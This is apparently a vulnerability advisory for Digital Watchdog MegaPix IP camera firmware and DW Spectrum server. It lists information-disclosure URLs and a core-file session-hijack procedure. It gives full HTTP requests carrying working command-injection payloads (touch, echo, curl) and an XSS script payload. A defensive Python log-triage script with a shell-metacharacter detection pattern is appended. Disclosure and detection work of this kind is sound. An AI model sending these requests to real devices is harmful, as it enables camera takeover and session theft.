The following issue was found on DW Spectrum server software version 4.2.0.32842.
Information Disclosure:
1. API call displays internal paths, IPs, OS version and architecture.
http://<SERVER IP>:7001/api/moduleInformation
All issues below were found on the A7.2.2_20211029 firmware of the MegaPix IP Camera by Digital Watchdog.
The following issues were found through unauthenticated URLs:
Information Disclosure:
1. Web files display internal paths and scripts, and software versions (CWE-201)
http://192.168.1.80/plugin_info_list.xml
http://192.168.1.80/plugin/plugin_web.conf
http://192.168.1.80/plugin/port.conf
2. Information disclosure and session hijacking through the core log (CWE-201)
Step 1. Generate a 500 error from an authenticated session by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action
Step 2. Get the core file by going to 192.168.1.80/cgi-bin/core
Step 3. Use the session token information from the error event to log into the admin pages
The following issues were found through authenticated URLs:
1. Command injection in the curltest.cgi web file
http://192.168.1.80/cgi-bin/admin/curltest.cgi
- injectable via the test[] parameters smtp_addr, smtp_port, sender, receiver, id, and pass
POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1
Host: 192.168.1.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 299
Origin: http://192.168.1.80
Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7"
Connection: close
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi
test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi
2. Command injection in the addacph.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi
- injectable via the event, id, pluginname, name, and evt_id parameters
GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a
3. Command injection in the license_tok.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi
- injectable via the POST parameters guid, license_value, and plugin_info
POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1
Host: 192.168.1.80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: http://192.168.1.80
Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476"
Connection: close
Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi
guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff'
4. XSS vulnerability in the bia_oneshot.cgi web file (CWE-79)
http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E
- file-contents injection allows persistent XSS through the blob parameter
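As an added example that is not part of this advisory: a Python triage script, written here for defenders, that scans web-server access logs in Common Log Format for the endpoints listed above. It assumes the camera (or a reverse proxy in front of it) writes such a log; the sample log lines are constructed, and the shell-metacharacter check is a heuristic, not a proof of injection.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Unauthenticated endpoints from the advisory that leak paths, versions
# or the core file; any hit is worth investigating.
DISCLOSURE_PATHS = {
    "/plugin_info_list.xml", "/plugin/plugin_web.conf",
    "/plugin/port.conf", "/cgi-bin/core",
}
# Admin CGI scripts the advisory reports as command-injectable.
CMD_INJ_PATHS = {
    "/cgi-bin/admin/curltest.cgi",
    "/cgi-bin/admin/vca/bia/addacph.cgi",
    "/cgi-bin/admin/vca/license/license_tok.cgi",
}
XSS_PATH = "/cgi-bin/admin/vca/bia/bia_oneshot.cgi"
SHELL_META = re.compile(r"[;|&`$()'\n]")   # shell separators and quoting
# Common Log Format (assumed): client ident user [time] "METHOD target PROTO" ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\w+ (\S+) [^"]*"')

def classify(line):
    """Return (client, label) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    path = urlsplit(target).path
    # parse_qsl percent-decodes each value, so '%3B' and ';' look alike.
    values = [v for _, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    if path in DISCLOSURE_PATHS:
        return client, "info-disclosure:" + path
    if path in CMD_INJ_PATHS and any(SHELL_META.search(v) for v in values):
        return client, "command-injection:" + path
    if path == XSS_PATH and any(re.search(r"[<>]", v) for v in values):
        return client, "stored-xss:" + path
    return None

def triage(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not from the advisory or a real device).
SAMPLE_LOG = [
    '10.0.0.7 - - [29/Oct/2021:10:00:01 +0000] "GET /plugin/port.conf HTTP/1.1" 200 312',
    '10.0.0.7 - - [29/Oct/2021:10:00:02 +0000] "GET /cgi-bin/core HTTP/1.1" 200 48213',
    '10.0.0.9 - admin [29/Oct/2021:10:01:00 +0000] "GET /cgi-bin/admin/vca/bia/addacph.cgi'
    '?mod&event=a&id=1&pluginname=a%3Bb&name=a HTTP/1.1" 200 17',
    '10.0.0.9 - admin [29/Oct/2021:10:01:05 +0000] "GET /cgi-bin/admin/vca/bia/bia_oneshot.cgi'
    '?blob=%3Cscript%3E HTTP/1.1" 200 9',
    '10.0.0.3 - admin [29/Oct/2021:10:02:00 +0000] "GET /cgi-bin/admin/setup_main.cgi HTTP/1.1" 200 5120',
]
```

POST bodies (the curltest.cgi and license_tok.cgi cases) are not recorded in an access log, so those two endpoints are only caught here when the payload sits in the query string; catching body parameters needs request-body logging on a proxy or WAF in front of the camera.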